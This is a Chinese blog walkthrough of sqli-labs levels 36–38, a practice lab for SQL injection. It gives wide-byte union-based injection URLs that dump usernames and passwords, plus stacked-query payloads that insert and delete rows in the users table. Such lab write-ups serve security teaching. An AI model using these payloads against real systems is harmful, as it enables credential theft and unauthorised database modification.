sqli-labs第36~38关

于 2024-08-11 22:05:00 发布
阅读量291 收藏 1
点赞数 11
分类专栏: sqli-labs 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46023655/article/details/141111925
版权

第36关

36关仍为宽字节注入,有报错信息,采用基于报错的SQL注入

判断为字符型注入

单引号注入

?id=2%81%27--+

字段数为3

回显点位置

?id=-2%81%27%20union%20select%201,2,3--+

数据库

表名

?id=-2%81%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+

列名

?id=-2%81%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+

用户名密码

?id=-2%81%27%20union%20select%201,group_concat(password),group_concat(username)%20from%20users--+

第37关

此关为post请求

采用burp suite工具进行注入,可以发现此关仍然为宽字节注入

为单引号注入,有报错信息,可以采用基于报错的SQL注入

字段数为2

回显点位置

数据库

表名

列名

用户名密码

第38关

此关为字符型注入

id=2 and 1=1

id=2 and 1=2

单引号注入

字段数为3

回显点

表名

第38关貌似与最初的几个关没区别,查看源码,发现多了这个

mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。这样容易造成堆叠注入,如

?id=2';insert into users(id,username,password)%20values(999,'panda','huahua')--+
?id=-2' union select% 1,2,group_concat(username,0x7e,password) from users--+

进行删除

?id=2';delete from users where username='panda'--+

熊熊爱吃不胖
关注
  • 11
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
详细sqli-labs(1-65)通讲解
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs进阶篇 32~38
Lucky小小吴的小屋
02-06 949
本文章主要讲述sqli-labs靶场第3238的通心得,从三方面讲述如何通,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
sqli-labs基础篇 第11~17
Lucky小小吴的小屋
01-23 1407
sqli-labs基础篇 第11~17
sqli-labs 基础篇 第8~10
Lucky小小吴的小屋
01-13 486
sqli-labs 基础篇 第8、9、10
SQLI-labs-第十五和第十六
weixin_54055099的博客
05-06 938
Sqlilab的第十五和十六,时间盲注
基于Sqli-Labs靶场的SQL注入-第6~10
Joker
11-25 1980
本文讲解 updatexml() 函数报错注入、导出文件字符型注入、布尔盲注、时间盲注、中国蚁剑简单使用、一句话木马注入
sqli-labs 靶场 less-11~14 第十一、第十二、第十三、第十四详解:联合注入、错误注入
Superstacks超全栈
06-09 675
同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。如果是这样的话,那就只能通过错误信息来获取数据了,如下所示。但这样还不能获取数据,则判断这个注入方式为错误注入。然后经测试采用双引号加注释符就可以验证登录成功。正常输入结果显示成功,不过没有任何提示内容。同样通过这一个点获取数据库名和用户名。通过输入判断出查询字符串的闭合方式为。获取数前数据库的数据名和用户名。获取当前数据库所有的表名。获取user表所有的列名。获取当前数据库所有的表名。获取user表所有的列名。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
422926799#note#sqli-labs第三十六1
07-25
sqli-labs Less 36代码如下:Less-36 Bypass MySQL Real Escape String//logging the conn
Dav_笔记12:Automatic SQL Tuning 之 5 managing SQL Profiles
Dav_2099的博客
08-07 1087
SQL配置文件包含对自动SQL调整期间发现的较差优化程序估计值的更正。此信息可以改进优化器基数和选择性估计,从而导致优化器选择更好的计划。SQL配置文件不包含有各个执行计划的信息。相反,优化程序在选择计划时具有以下信息源:■环境,包含数据库配置,绑定变量值,优化程序统计信息,数据集等■SQL配置文件中的补充统计信息如果环境或SQL配置文件发生更改,则优化程序可以创建新计划。您可以使用SQL配置文件,无论是否有SQL计划管理。如果使用SQL计划管理,则优化程序选择的计划必须是已启用的计划基准。
kubernetes集群部署sql server数据库服务
最新发布
jiang0615csdn的博客
08-08 427
kubernetes集群部署sql server数据库服务
dbeaver 导入sql 报错,ERROR 2059 (HY000)
hyq_07_27的博客
08-07 214
ERROR 2059 (HY000): Authentication plugin ‘caching_sha2_password’ cannot be loaded: 鎵句笉鍒版寚瀹氱殑妯″潡銆�。下载后解压压缩包,点击“添加数据库地址”按钮,选择新的MySQL8的所在目录.再次导入就可以了。可以下载 MySQL免安装版配置教程mysql-8.0.39-winx64.zip。先mysql连接设置,查看一下dbeaver的mysql 版本,是5.5.62.版本问题,MySQL8之后更换了密码认证策略。
MyBatis 如何通过拦截器修改 SQL
Hello World
08-03 542
假如我们想实现多租户,或者在某些 SQL 后面自动拼接查询条件。在开发过程中大部分场景可能都是一个查询写一个 SQL 去处理,我们如果想修改最终 SQL 可以通过修改各个 mapper.xml 中的 SQL 来处理。但实际过程中我们可能穿插着 ORM 和 SQL 的混合使用,隐藏在代码中不容易被发现,还有假如项目中有很多很多的 SQL 我们不可能一个一个的去修改解决。这个时候我们就需要通过 mybatis 拦截 SQL 并且最终修改 SQL。实现Interceptor接口,并写相逻辑。
sqli-labs-master前10
07-28
回答: 在sqli-labs-master前10中,可以使用不同的注入方法来获取数据库和表的信息。其中,联合查询、报错注入和sqlmap是常用的注入方法。联合查询可以通过判断注入点的类型、判断列数和使用order by语句来获取表名和字段名。报错注入可以通过使用extractvalue()函数来获取表名、字段名和字段的详细内容。而sqlmap是一款专门用于自动化注入的工具,可以通过指定参数和选项来获取数据库名、表名、字段名和字段的详细信息。在具体的卡中,可以根据题目要求和注入点的特点选择合适的注入方法来解决问题。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [【渗透测试】sqli-labs闯(1-10)](https://blog.csdn.net/qq_43168364/article/details/105496598)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [sqli-labs前十记录](https://blog.csdn.net/qq_43277152/article/details/113388041)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [sqli-labs(1-10)](https://blog.csdn.net/weixin_44268918/article/details/127181936)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值